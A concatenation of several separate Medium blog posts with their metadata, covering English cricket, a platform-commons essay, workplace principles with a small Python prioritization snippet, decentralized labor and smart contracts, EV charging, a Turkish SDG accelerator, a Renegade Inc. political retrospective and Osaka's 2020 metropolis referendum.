Back home, the knives are already out. The blame is already being apportioned. The old four-yearly Christmas favourites are being trotted out. The County Championship is not fit for purpose. The Hundred. Too much cricket. Not enough preparation. Focus on the white ball. The decline of cricket outside of the private school select. Some answers are obvious but unfeasible. Some not so much so, but do-able. Compromises are discussed. Inevitably, the point is raised: “If this is so difficult to sort out, and so many people with so much to lose are unwilling to do so, what’s the point of doing all of this at all?”
The fragile system on which English cricket is built, patched up for so many years with duct tape and superglue, has finally finished its slow collapse.
|
https://medium.com/@nickrchambers1/black-tuesday-or-musings-on-the-point-of-it-all-f289a66fddfd
|
['Nick Hayhoe']
|
2021-12-30 09:06:10.524000+00:00
|
['The Ashes', 'Cricket']
|
If Not Now, When, And Who With? Thoughts on Social Transformation Toward the Adoption of Platform Commons
|
The Big Five in tech have power exceeding that of governments, or even that of other companies combined for that matter. These, and companies like them, must be reined in, transformed into a common resource to serve the public good. Attempts to address the sheer power of these behemoths via distributed cooperative alternatives exist, but they have failed.
So, I’d like to propose a synthesis of sorts. Let’s take Amazon. What is it? It is a marketplace aimed at providing the best quality product for the lowest price. This, in fact, should be applauded. The issue is that the rewards go to a few, most notably Jeff Bezos, whose fortune is bound to exceed $200 billion in the near future, especially considering the lockdown nature of the pandemic may well continue for longer than expected, particularly if, as many scientists fear, the virus continues to adapt beyond the scope of vaccination.
It seemed at one point there was an air of solidarity — initially — during lockdown, but now it seems people are mostly out for themselves and just want to keep tight (suffer quietly) and stay secure, while many others just want to get rich. There is no collective positive vision for the future (which is highly problematic), other than extracting wealth from Africa via Bitcoin, in some flailing attempt to give that platform once incubated by a combination of anarchist cypherpunks and Austrian-school-bashing techno-libertarians an air of functionality, when in reality it is a Ponzi scheme, now aimed at exploiting Africa using smooth Silicon Valley rhetoric, a repackaging of an old and tired story.
So let’s return to Amazon. It’s said Jeff Bezos could pay all Amazon workers over $200,000 and still have more than a pre-pandemic net worth. Bezos deflects this by saying he owns a small portion of the company and the majority goes to other shareholders — so let’s address them as well. What if we then combined the Big Five and other top performing companies into one mega-corporate structure and have dividends paid out to everyone? Whatever income insufficiencies, with a nod to Modern Monetary Theory, nations can simply continue deficit spending, issuing Jubilees or debt cancelations, until currency, at least as we know it, is no longer needed, as the extractive economy is translated into an equalized transfer economy based on material resources and human capacity highly augmented or replaced by highly adaptive and knowledgeable tools, the part of ourselves we call machines.
The suitcase phrase for the system to come can be called a platform commons. More than just myself and a handful of others need to discuss, deliberate, and implement these views. The major problem is that well funded mass media outlets continue to distort the dialogue in the interests of elite power. These reactive minds would have you think I want a post-scarcity society to deny my own responsibility, when in fact, I advocate for this umbrella term to ensure myself and others can become more responsible, by enabling the active monitoring of all life process we depend on. It is absolutely appalling to not address the deep seated and systemic greed that has plagued the world with destitution, mentally and physically. Leaving it to the market is truly irresponsible, destroying the future of diversity of life on Earth, if not life itself.
“But what can I do?” you might ask. ‘Netflix and chill’ until it all blows over and eventually works out? And when will that be? When we and all life on Earth are dead?… I too feel complicit. The fact I know this much (and I feel I know very little), with my inherent Protestant (Western) indoctrination wishing to “save Souls” and “do Good,” I’m compelled to continue making prison cell scratch marks into the digital void. I, or anyone else who may take up this line of thought and potential action, will be just another remark soon forgotten if a substantial community, a new rising minority, fails to materialise. This minority must be highly pragmatic, but coordinated, adopting a variety of ideologies, utilizing an array of disciplines, while accepting none if but with the lightest touch, acting in ways that may seem counterintuitive, while ultimately, perhaps at a crawl, then all at once: delivering us from bondage.
|
https://medium.com/@nathancravens/if-not-now-when-and-who-with-6c1a296b6ab1
|
['Nathan Cravens']
|
2020-12-22 16:11:43.527000+00:00
|
['Platform Economy', 'Social Change']
|
My Six Guiding Professional Principles
|
Work on anything long enough and you will start to develop a theory, a philosophy on the how and why of it. Play a sport for years, and you will develop a system of which attributes and strategies are best. Play an instrument, and you will also find techniques and styles that best suit you.
Work for a while and a set of guiding principles will emerge as well. For better or worse, work is the single thing that will take up more of our time and almost certainly the most mental energy throughout our lives. So, it’s no surprise that after a while you discover principles that you can apply.
Principles are useful because they help guide you. They help you make trade-offs, prioritize, and navigate the tricky situations we all find ourselves in.
Here are mine.
1 — Most business problems are people problems. Understanding people better helps business.
Yes, a lot of business problems are technical, logistical, financial, etc but when you boil the rest down, it comes to understanding how to get people to act in certain ways. Think about it.
Marketing — How do we create messages that resonate with and motivate people?
Product — How do we create tools that are empowering for people?
Sales — How do we create valuable relationships with people?
Management — How do we create environments for happy, productive people?
We want people to open emails, click links, and add to their carts. We want people to listen to us in meetings, we want people to learn how to use our tools in the right way, we want to be able to communicate all this easier and more effectively.
It would be wise to spend more time learning about psychology and the intersections of behavioral science within our work. Humans are complicated and unique. We don’t always understand the reason for our own actions, much less the actions of others.
However, where we do understand people there is a great opportunity. This is the basis of design-thinking, UI/UX frameworks, neuromarketing, copywriting, management techniques, and more.
We could all do a lot better if we took stock of how well our business practices align with the current understanding of human nature.
2 — The product is the most important aspect of the company
You walk into a car dealership’s showroom. It’s beautiful, the architecture has been designed to make you excited about being there. A nice-looking salesman comes up and connects with you immediately. He begins to talk to you about their top-line model that is front-and-center. It’s magnificent and appealing in every way. The only problem? It’s a sports car and you came looking for a truck.
Now imagine a similar scenario where the dealership sells nothing but trucks. Yet, when you test-drive it, it has some nice features but is missing a few fundamentals. It has a heated steering wheel and remote start, but not enough torque or bed-space for you.
These are two examples to demonstrate how important getting the product right is. You can have the best design, marketing, sales, and operations available but if you’re not getting to the heart of the customer’s needs, it doesn’t matter. Similarly, you can be addressing needs only in ways that are flashy or easy, but not substantive, and still fail.
I know it’s cheating, but I’ll use Tesla as an example here. No marketing, no showrooms, no PR team, limited sales infrastructure. The product on its own is so good that they don’t need the rest to help paper over cracks.
Often, when you think you have a marketing or sales problem, you really have a product problem. Think back to the early days of Uber. They had cracks all over the place. Sometimes unreliable service, high-profile incidents, glitchy app, etc. They maintained momentum because the product itself was much better than the alternative.
3 — Ego is the enemy
People’s egos are typically the biggest cultural issue in any organization.
Ego is the part of ourselves that exists to reinforce and support our self-importance and identity.
Ego is especially rampant at work because people are desperate to have themselves perceived as smart, hardworking, valuable individuals. To lose that perception and status is often to lose your job.
Here are some of the negative impacts of the ego at work:
It leads to HiPPO (highest-paid person's opinion) decision-making, instead of decisions made collectively, or by the people closest to the problem.
People behave in ways that reflect well on them, instead of on the team, slowly creating a toxic environment.
People are afraid to admit to mistakes or ask for help. In the worst-case, this can create all kinds of problems, or in the best-case still prevents learning.
People get too attached to outcomes, and not enough to process. Nobody gives anything enough time to breathe and be understood.
The list goes on.
When you create a low-ego environment, people feel compelled to speak up, to mess up, to be creative and risky for the greater good of the team. With the freedom to experiment and fail, more creative solutions and lessons are found. When you foster an environment where people can be vulnerable, connections and teamwork are better.
We all have egos, the failure in realizing how much it is impacting our thoughts and behavior is the real mistake. Ego is the enemy, fight it.
4 — Ruthlessly Pareto prioritizing is key
When you think about it, the word “priorities” is in itself an oxymoron. Maybe it is possible to have multiple priorities but that number tops out at 3. If everything is a priority then nothing is a priority. In the long run (and that is the only run that should matter), doing the right things well is more important than doing more things. The problem is that sometimes you have managers/management rolling out priority lists that are 5+ items long.
Velocity reminds us that there is a difference between speed and direction. You can have a great ship with excellent sailors going full steam ahead. If you're sailing in the wrong direction, it won't matter.
I say “Pareto prioritizing” because I am a big believer in the Pareto principle. That 80% of the effects result from 20% of the causes. Whatever product or service you’re working on, there are likely a few things that end up delivering the most value. I believe it is often better to double-down on strengths, rather than supplement weaknesses. The worst strategies are the ones where you say, “we’ll do a bit of everything to cover our bases”. It sounds safe but is actually risky because you a) risk losing the opportunity to optimize and b) end up doing a lot okay but nothing great.
This is why you have to be ruthless in prioritizing. Look for the few things that make your offer unique and valuable, and focus on improving those. Let the rest sit on the wayside to be revisited later.
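The ruthless Pareto prioritizing described above can be sketched in a few lines of code. This is just an illustration of the idea, not a real planning tool, and the feature names and value scores are made up:

```python
# Sketch of "Pareto prioritizing": rank candidate work items by estimated
# value and keep only the smallest set that covers ~80% of the total value.
# Items and scores below are hypothetical, for illustration only.

def pareto_shortlist(items, threshold=0.8):
    """Return the fewest items (highest value first) whose combined
    share of total value reaches `threshold`."""
    ranked = sorted(items.items(), key=lambda kv: kv[1], reverse=True)
    total = sum(items.values())
    shortlist, running = [], 0.0
    for name, value in ranked:
        shortlist.append(name)
        running += value
        if running / total >= threshold:
            break
    return shortlist

features = {
    "checkout flow": 50, "search": 25, "dark mode": 10,
    "badges": 8, "animations": 7,
}
print(pareto_shortlist(features))  # ['checkout flow', 'search', 'dark mode']
```

Three of five items cover 85% of the estimated value here; the other two go on the back burner to be revisited later.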
5 — Decision-making is more important and flawed than we realize
There’s a depressing facet of work that goes under-recognized. A lot of work is either correcting for mistakes or realizing that the ship you’re sailing has been heading in the wrong direction and now you must course-correct with fewer resources. (Can you tell I like this sailing metaphor?)
It all starts when a decision is made on what to work on and how. The problem is that there are all sorts of landmines that jeopardize the process, unseen and only obvious after-the-fact.
We humans don’t do well deciding under uncertainty. Availability bias, decision fatigue, fundamental attribution error, survivorship bias, gambler’s fallacy, etc. None of us are immune to taking mental shortcuts in these situations, but the more aware of them we are, the better we can side-step them on the path to success.
It’s always been surprising to me that considering the importance of getting consequential decisions right, few organizations deploy frameworks that act as guardrails to guiding themselves towards the best ones. What usually happens is that people who are considered to have the most experience and thus best judgment gather data and decide on their own. Is this the best we can do?
We should ask more of ourselves by asking questions like:
“Are we making this decision now because we are tired of deliberating?”
“Who is the best person to make this decision?”
“Is this decision reversible or irreversible? How does that change things?”
“How confident do we need to be before deciding? What do we need to increase our confidence level?”
Successes and failures can be followed back to a single decision that resulted in a string of (potentially forced) decisions. Obviously, we can’t get them all right and it’s impossible to know the future, but we can get much better.
6 — Don’t take yourself or the work too seriously
Don’t get me wrong here, work is serious. Your work affects other people’s work, which affects their professional and personal lives, as well as your customers. You should do your best to show up each day as a person that can help others. However, unless you’re in the life-saving business or pulling big levers in the economy, it’s useful to remember not to take it too seriously.
People are unknowingly/unwillingly self-absorbed and most of what you do won’t impact them for too long. Indeed, a lot of services are meant to be as out-of-sight, out-of-mind as possible.
They don’t care about your company as much as what you can do for them. They don’t want to be part of your company’s “community”. They don’t want to get your newsletter so they can keep up with what you’re doing. You shouldn’t invest much in these tertiary things either. Focus on how well you’re delivering your unique value and put the rest on the back burner.
Forgive me for getting too philosophical here, but most of your work won’t really matter either. Think about how stressed you might’ve gotten at a job you left years ago. How often do you still think about it? That work might not be used in that company anymore anyway. Think about all the brilliant doctors, engineers, writers, etc who lived only 100–200 years ago. You have no idea who they are or what their work was. The same will happen to you.
Don’t get too angry with yourself, nor with others. It’s not worth it when it won’t matter. Keep the big picture in mind and ask yourself if this is something that will matter to you or others in a few hours, a few weeks, a year, or 5 years.
Your mental state is crucial, you have to live with yourself 100% of the time. Few things at work are worth ruining your mental state for too long. Apply some stoicism at work and see if it doesn’t make your life a bit easier.
Conclusion
A theme of mine here is understanding. The better you understand yourself, your coworkers, your customers, your market, etc. the better off you will be. This includes recognizing and correcting for blind spots in your understanding. That understanding is powerful, though. It allows you to prioritize and make decisions much more easily.
My hope is that these principles are useful for you as you evaluate your own philosophy of work.
|
https://medium.com/@sloanthomas/my-six-guiding-professional-principles-54f5599a2f49
|
['Thomas Sloan']
|
2020-12-11 20:37:57.674000+00:00
|
['Professional Development', 'Work', 'Philosophy', 'Psychology']
|
Decentralized Labor and the Future of Work
|
Photo by rawpixel on Unsplash
Digitally decentralized labor, in simple terms, is when large tasks are broken into independent tasks — it’s the assembly line for the thought economy. With advances in smart contract technology, it may just be the future of work. Much like the far-reaching application of the assembly line in optimizing manufacturing processes, decentralized labor can be applied in a number of ways.
Google has relied on decentralized labor for more than a decade, and you’ve (probably, unwittingly) participated. When Google worked to digitize the archives of the New York Times and many books in the early-oughts, they ran into a major problem: their Optical Character Recognition (OCR) software was only 80% accurate and required some babysitting. For each page the company scanned, they were constantly tweaking the software to teach it to recognize new words, fonts, and variants.
In time, the company started working with reCAPTCHA to streamline their word recognition process. By asking individual internet users to identify a string of words before accessing their site, Google killed two birds with one stone: (a) they helped fight fraudulent traffic, and (b) they got real, live humans to train their software. You helped Google identify that smudged or ill-scanned word to help bolster their machine learning. Today, Google continues this practice with images to train its driverless car software.
The human contribution of this short and simple task unlocked tremendous value for Google and the website owner — and smart contracts enable the individual to get in on the action as well.
The Digital Assembly Line & Smart Contracts as a Manager
When problems can be factored into fungible work units, the organization can distribute those tasks to individuals and create a digital assembly line.
Given the correct framework, like HUMAN Protocol, smart contracts play middle-manager: offering an exchange where jobs can be bid on and accepted in a fair way, ensuring the successful completion of a task, evaluating and confirming quality, and managing compensation (which is especially important when managing micro-payments).
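The middle-manager role described above — accepting a task, verifying completion, and releasing compensation — can be sketched as a simple escrow state machine. This is an illustrative sketch, not the actual HUMAN Protocol API or a real smart contract; the class, names, and amounts are hypothetical:

```python
# Illustrative sketch of a smart contract acting as "middle manager" for a
# micro-task: it holds the bounty in escrow, tracks the task's state, and
# releases payment only after the requester approves the submitted work.
# Hypothetical names/amounts; not the HUMAN Protocol API.

class TaskEscrow:
    def __init__(self, requester, bounty):
        self.requester, self.bounty = requester, bounty
        self.worker, self.result, self.state = None, None, "open"

    def accept(self, worker):
        # A worker bids on and claims the open task.
        assert self.state == "open"
        self.worker, self.state = worker, "assigned"

    def submit(self, worker, result):
        # Only the assigned worker may submit a result.
        assert self.state == "assigned" and worker == self.worker
        self.result, self.state = result, "submitted"

    def approve(self, requester):
        # Quality confirmed: release the escrowed bounty to the worker.
        assert self.state == "submitted" and requester == self.requester
        self.state = "paid"
        return (self.worker, self.bounty)

task = TaskEscrow("labeler-inc", bounty=0.02)
task.accept("worker-7")
task.submit("worker-7", {"image_42": "stop sign"})
print(task.approve("labeler-inc"))  # ('worker-7', 0.02)
```

The point of the state machine is that no step can be skipped or forged: payment is only reachable through acceptance, submission, and approval, which is what makes micro-payments manageable without a human coordinator.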
Photo by Kaitlyn Baker on Unsplash
The first HUMAN Protocol application is hCaptcha, a CAPTCHA-like offering which performs similar bot-fighting and image-identifying functions, but also compensates the website host itself for their role in filling the top of the funnel. The company also plans an exchange where an individual can log in and perform these tasks.
Smart contract-based management represents not only a significant improvement over Amazon Mechanical Turk but also, perhaps, the future of work itself.
|
https://medium.com/blockstreethq/decentralized-labor-and-the-future-of-work-c6a5c6881522
|
['Andrew J. Chapin']
|
2018-10-18 23:48:46.210000+00:00
|
['Decentralization', 'Blockchain', 'Bhq Contributors', 'Cryptocurrency', 'Bitcoin']
|
2020: Year of the EV Launchpad
|
(Illustration by Mike Bloom)
Let's face it, 2020 has been one of the most hectic and confusing years we may ever experience in our lives. Yet despite a global pandemic and general social unrest, 2020 has somehow been an important year for clean energy and climate change. For me, the commitment of regulators, utilities, consumers, and finally automakers has signaled the strongest commitment to electric vehicles and charging infrastructure we have ever seen — each providing a ‘launchpad’ if you will to get electric vehicles (and the infrastructure to make them go) off the ground.
EV Charging North Stars: States & Utilities
In the United States, the focal point of this progress has been state action. Kick-started with mitigation funding from the VW diesel emissions settlement, California and New York are leading the charge by committing millions in EV charging programs to bring over 170,000 new stations online by 2025. These two coastal heavyweights are essential to long-term transportation change, and their effort to make charge station adoption attractive is unmatched across the country.
It is important to call out how these two states have been north stars for many others taking their own big step forward in EV charging. State government and utilities play an important role in increasing electric vehicle adoption in their backyards, and it starts with infrastructure. The few states and utilities operating make-ready programs today have ‘crossed the EV chasm’ so to speak, leading with future-proofing requirements for charging in order to achieve customer choice and data transparency. This includes chargers being networked and OCPP-compliant, a way for station operators to control pricing, access, and energy load for their stations. In what felt like a pipe dream just a few years ago, electric vehicles and charging are quickly evolving into complete and complex solutions.
(Source: ‘Crossing the Chasm’ by Geoffrey Moore)
We’re now seeing first followers cross the chasm with state and utility incentive programs of their own. Workplace charger rebates, public DC Fast Chargers, utility fleet electrification — these are just some of the ways states are building an EV launchpad of their own to meet carbon reduction targets. For many of these programs, appetite is high and the incentive money dries up quickly. Perhaps a good problem to have for the many communities striving to be carbon neutral by 2030.
Automakers Are Investing In, Not Just Talking About EVs
For years, automakers have been floating the idea of an electric and autonomous future. While most release a new concept car for their trade shows (half of them missing a motor), this year definitely felt a little different.
In 2020, investment in U.S.-based manufacturing for electric vehicles has been a prime indicator of automaker’s commitment to electrification. Tesla has been an obvious leader with their Nevada Gigafactory, and soon to be operational ‘Giga Texas’ in Austin. General Motors has also kept busy announcing a $2 billion EV investment for their Tennessee plant, $150 million for their Michigan plant, and plenty of new electric models planned for years ahead. And let us not forget the ‘SPAC’-tacular public offerings with dozens of private EV companies making the leap to public in the blink of an eye.
According to IEA’s 2020 Global EV Outlook Report,
“EV sales reach almost 14 million in 2025 and 25 million vehicles in 2030, representing respectively 10% and 16% of all road vehicle sales. In a more ambitious scenario, the global EV stock reaches almost 80 million vehicles in 2025 and 245 million vehicles in 2030 (excluding two/three-wheelers).”
Pretty soon we won’t be able to point to a few expensive Tesla models propping up the EV industry. PHEVs and BEVs are as popular as ever, and range anxiety is dwindling quickly as battery technology improves for both capacity and consumer’s wallets.
AmpUp: A Launchpad For Charging Access
I could not be more humbled to join AmpUp this year, a company truly proud to accelerate the electric vehicle evolution taking the United States and the rest of the world by storm. It is going to take a lot more than one car manufacturer or one charge station provider to make impactful change, and it is exciting to see station owners of different types take the leap to electric with us.
AmpUp is championing the movement to make private charging stations publicly accessible. We see this as yet another launchpad for widespread adoption of electric mobility, particularly in cities and densely populated areas where home charging is not an option. EV drivers today and tomorrow need increased access to charging — and we all need cleaner electricity to power these stations.
With education and user experience at the forefront of what we do, AmpUp has been laser-focused on providing the tools to make EV charging easy and stress-free. Our software-first approach has opened so many doors for us in 2020, and there is nothing more rewarding than hearing how much our customers enjoy their charging experience. Additionally, we could not be more grateful for partners new and old helping workplaces, universities, multi-unit dwellings, and utilities become proud new operators of their own electric vehicle stations.
This year has helped me understand just how critical the EV launchpads all around us have been to sparking early industry success. I think I speak for everyone in the EV charging business when I say we can’t wait to see what launchpads emerge in 2021…
Stay driven,
Matt Bloom
(Thanks to Tom Sun for proofreading and commenting on this.)
|
https://medium.com/@matthewbloom/2020-year-of-the-ev-launchpad-987c032a1e6c
|
['Matt Bloom']
|
2020-12-22 02:53:15.100000+00:00
|
['Electric Vehicles', 'Energy', 'Mobility', 'Sustainability', 'Transportation']
|
Three policy innovations that Turkey is making through the SDG Impact Accelerator
|
This unique public-private partnership structure enabled the implementation of three innovative approaches for the international development and diplomatic communities:
Technology diplomacy. For centuries, armies were the most crucial power of nations. Then came economic statecraft. In the last two decades, diplomats started to talk about soft power — the ability to shape the preferences of others through appeal and attraction. Only in the last few years has “technology diplomacy” become a tool for foreign policy. This is why more than 30 countries around the world have a startup visa program now (the most famous being Startup Chile). This is also why Denmark, and in turn, France appointed “technology ambassadors.” These countries acknowledge that technology in itself became a “superpower” and they need to establish “diplomatic” relations with the technology actors to get the most out of them.
SDG Impact Accelerator is a technology initiative that epitomizes Turkey’s basic pillars about foreign policy: humanitarian values and entrepreneurial spirit. Startups from around the world, including Kenya, Rwanda, the Netherlands, the United Kingdom, the United States, Palestine, Jordan, and India, worked on global technology solutions for the global refugee issue.
Probably, there could not be a better testbed for solutions targeting 60 million refugees around the world than Turkey, given Turkey hosts 4 million Syrian refugees, the largest refugee population in the world. SDG Impact Accelerator brought together the United Nations, global philanthropies and businesses with startups to implement real solutions. By walking the walk instead of talking the talk, SDG Impact Accelerator has set a new benchmark for technology diplomacy.
|
https://medium.com/make-innovation-work/three-policy-innovations-that-turkey-is-making-through-the-sdg-impact-accelerator-618b31345d6a
|
['Ussal Sahbaz']
|
2019-09-16 07:49:27.428000+00:00
|
['Techdiplomacy', 'Sustainable Development', 'Sdgs', 'Gates Foundation', 'Undp']
|
Renegade Retrospective 2020
|
Spaceship economy
A key feature of 2020 has been Covid-19 and its impact on society and economy. Friend of Renegade Inc., Steve Keen, predicts that the pandemic will result in a bigger economic shock than 2008 and says it could result in the entire production system breaking down leading to possible shortages of food and medical supplies.
Citing William Baumol’s conceptual understanding of the spaceship economy, the economist argues that the pandemic has unveiled the fatal flaws in what was already a fragile economic system. Pandemics and other unpredictable tragic events highlight the limitations of a hollowed-out capitalist economic system that we are told is the most efficient and effective available. Invariably, though, it’s the poorest who end up paying the price for such a system.
Fellow economist, Richard Wolff, reiterates that the level of displacement is stark:
“The system isn’t working. And that’s not because we have a virus. None of it was planned for. And the reason is simple. In a private profit system, no producer of a test kit or a mask or a ventilator or anything else has any incentive to produce them if they’re not profitable to stockpile them. It turns out that capitalism’s profit system is a very inefficient way to cope with fundamental threats to public health”, says Wolff.
Whilst society suffers as a result of the system’s erosion of public health, author and journalist, Gerald Posner, argues that it’s Big Pharma who end up as the beneficiaries:
“There are parts of the pharmaceutical industry that are salivating at the pandemic, not because they want people to die or because they engineered the pandemic in a secret lab, but because this novel virus gives them a possible once in a lifetime opportunity for enormous profits”, says Posner.
Too much war, not enough investment
As Brexit looms on the horizon, profiting from the NHS appears to be the focus for American health care and insurance companies. Guest, Dr. Bob Gill, argues that the objective of these companies is to bleed the service dry by introducing a pay to play system, lumbering UK citizens with massive administrative and medical costs.
Gill notes that insurance-based systems create perverse incentives which he says inevitably lead to the breaking of the relationship between doctor and patient. As Gill makes clear, the transformation of what is an amazing public health investment story into a US-based health care system would be a disaster for universal free-at-the-point-of-delivery health care provision in the UK.
Writer, and guest of the show, Indi Samarajiva, says that successive US administrations since the Reagan era have prioritized war. Alibaba founder, Jack Ma, has similarly argued that in the US there has been too much war and not enough public investment.
One of the by-products of so much US military adventurism overseas is an oversupply of troops arriving back in the country and looking for work, many of whom end up in local police forces. “The military teaches you how to close with, and destroy, the enemy through firepower and manoeuvre, which is the last thing you want a cop to be doing”, says former Intelligence Officer, Scott Ritter.
The killing of George Floyd is not only emblematic of what happens when a militarized US police force gets out of hand but also, as human rights activist, Ajamu Baraka argues, is a trigger point in response to the structural contradictions inherent to neo liberalism that gives rise to systemic police brutality.
More broadly, the inability of the country to manage its domestic affairs in a just way relates to the exceptionalism the establishment in Washington has confected for itself on the global stage. As editor and columnist, Margaret Kimberley, succinctly puts it: “You can’t have injustice abroad, but have justice at home. The two are linked. When you have a country that sees itself as having the right to do whatever it wants to anyone, then that ethos is repeated here.”
Barbarism begins at home
One of the most confusing and barbaric events in 2020 has been the Julian Assange trial. Surely journalists and the public can foresee the ramifications of not standing up for freedom of the press? Independent journalist, Richard Medhurst, argues that not only have the corporate and independent media been inept in this regard, but they have engaged in a decade-long smear campaign against Assange.
Medhurst states that if the WikiLeaks publisher is extradited, he will almost certainly be convicted. This will set a precedent for other whistleblowers and mean the end of journalistic freedoms as we know it. Fellow journalist, Taylor Hudak, concurs that the political persecution of Assange and any life sentence handed down to him in a federal supermax prison will deter others into publishing information that is embarrassing to the United States government.
A media blackout is a prerequisite to exporting so-called democracy globally at the point of a gun. But that playbook is beginning to look dated, especially as we see that Imperialism 2.0 has little or no regard for the people it’s meant to be liberating. Author and professor of law, Daniel Kovalik, explains how Washington’s post-WW2 tactic of maintaining its historically dominant role has shifted from direct and indirect control pre-Iraq, towards a strategy of chaos and plunder. This strategy has been in retreat under Trump following the killing of the Iranian general, Qassem Soleimani.
Investigative journalist, Gareth Porter, outlines the logic:
“The US national security state really needed Iran as an adversary in order to partially, at least, try to make up for the loss of the Soviet Union as its primary adversary and primary excuse for the Cold War level of spending on the military and intelligence”, says Porter.
Business as usual?
But now with the American election jamboree out of the way, many believe that the US will return to ‘business as usual’ under president-elect, Joe Biden. Indeed, as CODEPINK National Co-Director, Ariel Gold reminded us, Biden himself promised the American people a return to ‘normal’ during his election campaign:
“Normal, is the problems that we know all too well of neo liberalism. Normal, is a bloated Pentagon budget. Normal, is our endless wars. Normal, is corporate control of so much of the American politics. Normal, is in a massive infusion of money in politics. So normal is not something to look forward to”, says Gold.
The question is, can society afford the kind of phenomenal scale of financial stimulus needed to maintain the status quo?
Author and Educator, Graham Brown-Martin, argues that we need to adopt a different economic model to the ‘extractive’ one introduced following WW2:
“We simply can’t have an economy which damages the environment, creates gross inequality, and also, ultimately, does lead or creates the environment or the conditions for a pandemic to thrive”, says Brown-Martin.
At the end of a year like 2020, it’s easy to feel hopeless. But this misses the point. The real heroes of the year weren’t the presidents, politicians, prime ministers and corporate CEOs. The real heroes have been the workers — teachers, doctors, nurses — in short, all those people who create real value. They’ve kept our society and our economies moving. And what underlies this is a new understanding that we are collectively way more powerful than we think.
Economist, Ann Pettifor, explains:
“I want us to understand that we have power, that the private finance sector, Wall Street, is dependent on the public institutions. These are public servants. They’re heavily reliant on public institutions, not just in times of crisis, but all the time. The thing that the banks want more than anything in the world is our debt. And so therefore, we can say, yes, OK, but if you want this stuff, these are the terms and conditions. So I want us to feel that power”, says Pettifor.
Watch the full episode now
|
https://medium.com/@renegadeinc/renegade-retrospective-2020-472e2f853df
|
['Renegade Inc.']
|
2020-12-27 18:26:04.385000+00:00
|
['Wikileaks', '2020', 'Covid 19', 'Brexit', 'Capitalism']
|
The End of Ishin no Kai’s Dream
|
NO CAMP
The lower turnout in 2020 also produced a decrease in the votes received by the NO camp, supported by the local LDP and the Opposition parties, the JCP and the CDPJ.
They received 692,996 votes, 12,589 fewer than in 2015, when the NO side, which then included Komeito, won with 705,585 votes.
2015 Referendum: 705,585 2020 Referendum: 692,996 Change: -12,589
A first look at the map reveals the wide disparity of swings across the city. What stands out especially is how large both the increases and the decreases in NO votes were. These changes were the reverse of what we found in the YES camp, though of different proportions.
Change of total raw votes for the NO camp
In an environment of low(er) turnout, the NO side’s advantage was that, in total, they were able to offset their huge loss of votes in their former strongholds with a raw increase in districts that had not been at all favorable to them in 2015 (the same ones where the total vote cast increased, over a larger population).
Their increase in raw votes was particularly strong in districts where the YES campaign had been strong back in 2015:
Kita-Ku +4688
Nishi-Ku +3866
Chuo-Ku +3157
Fukushima-Ku +1740
However, their decrease in votes in some of the best districts they had in 2015 was a point that confounded me on election night. In those places, the total turnout plummeted too:
Hirano-Ku -4652
Suminoe-Ku -4042
Ikuno-Ku -3105
In the end, however, these losses were not big enough for the YES camp to overcome the NO’s lead.
For weeks, polls had shown a tight race in which the YES campaign led, but always by narrow margins, within the margin of error. As I said on my Twitter @nihonpolitics, it was likely that the 10%-15% of undecided voters leaned towards the NO, as their nature did not predispose them towards supporting such a radical idea, one that would have abolished the City of Osaka itself. In the end, Osaka Ishin no Kai failed once again to pass the plan, even with the help of Komeito.
Consequences of the rejection of the Osaka Metropolis Plan Referendum
Although a local matter in Osaka, it is no mistake that the referendum could have big national repercussions for all the different parties in Japan. I would like to summarize some ideas:
Ishin no Kai「維新の会」: Ishin no Kai, the main proponent of the Osaka Metropolis Plan, and the party that governs both the city of Osaka and Osaka Prefecture, was the main loser of the referendum. The citizens of Osaka rejected last month, for a second time after 2015, its idea of abolishing the city of Osaka and turning it into four or five special districts in the image of Tokyo.
Five years after the first, also failed, referendum, they repeated the same mistakes:
Ishin no Kai polarized to the extreme the question of the “Osaka Metropolis Plan”: It was their plan, their foundational dream (as I explained in a previous post), and, for better or worse, they made people identify support for their party with support for the plan, which limited the plan’s electoral ceiling from the beginning.
The leaders of Ishin no Kai (Mayor Matsui Ichiro and Governor Yoshimura Hirofumi) failed once again to adequately explain the benefits of the Osaka Metropolis Plan: As polls showed, a large majority of the citizens of Osaka (above 70%) acknowledged that they did not fully understand what the plan was about or the benefits it would supposedly bring them. It was an inexcusable mistake that doomed the plan from the start. Whatever benefits existed, concerns about a possible decrease in financing for schools and social services overrode the proponents’ argument of long-term savings for public finances from eliminating duplications.
The overwhelming control of Osaka politics by Ishin no Kai was countered by a polarized environment: For over a decade, Ishin no Kai has fully controlled the governments of Osaka City and Osaka Prefecture. Although they have needed allies to govern (I will come back to them later), their electoral wins have been so commanding at the local, prefectural and national levels that they likely felt invincible, immune to criticism. However, the people of Osaka had other plans. In a face-to-face match, where political parties disappeared, the party failed for the second time in five years to convince more than 50% of the citizens of Osaka City of its plan. It showed that Ishin no Kai has a ceiling that does not reach 50%, even including supporters from other parties.
Ishin no Kai is the dominant party of Osaka, with less than 40% of the vote (at least in national elections).
Press conference after the defeat: Gov. Hirofumi (left) and Mayor Ichiro (right). Source: https://www.jiji.com/jc/article?k=2020110200029&g=pol
The first victim of the defeat was Osaka Mayor Matsui Ichiro, the leader 「代表」of the party, who decided shortly after the defeat that he will serve the remainder of his term as Mayor and then resign.
Matsui Ichiro had become the leader of the party in 2015 after the exit of the founder, Hashimoto Toru, who resigned after the first referendum defeat. It certainly looks like Matsui Ichiro is following his path. He will retire once his term as Mayor ends in 2022.
On the 21st of November, in a special party meeting, the young Governor of Osaka Yoshimura Hirofumi was elected the new leader of the party by 232 votes against 11 won by Katayama Toranosuke「片山虎之助」, a veteran party member of the House of Councillors.
Komeito「公明党」: The second big loser of the referendum, very closely behind Ishin no Kai, was Komeito, the Buddhist-based party.
Komeito, which had opposed the Metropolis Plan in 2015, this time around caved to the threats of Ishin no Kai and changed its position. To understand Komeito’s surprising about-face, we have to understand its politically vulnerable situation in Osaka (I will succinctly sum it up; you can see a larger explanation in my previous article).
Komeito currently holds four single-member districts (SMDs) in Osaka Prefecture in the House of Representatives (Diet), but it greatly fears a possible challenge by Ishin no Kai candidates in those SMDs, which could threaten what is a party stronghold for Komeito. Although the party has avoided these challenges before, the threat has always hovered over it like the sword of Damocles, and it will remain now that the referendum has contributed to a certain breakdown of the bilateral Komeito-Ishin ties.
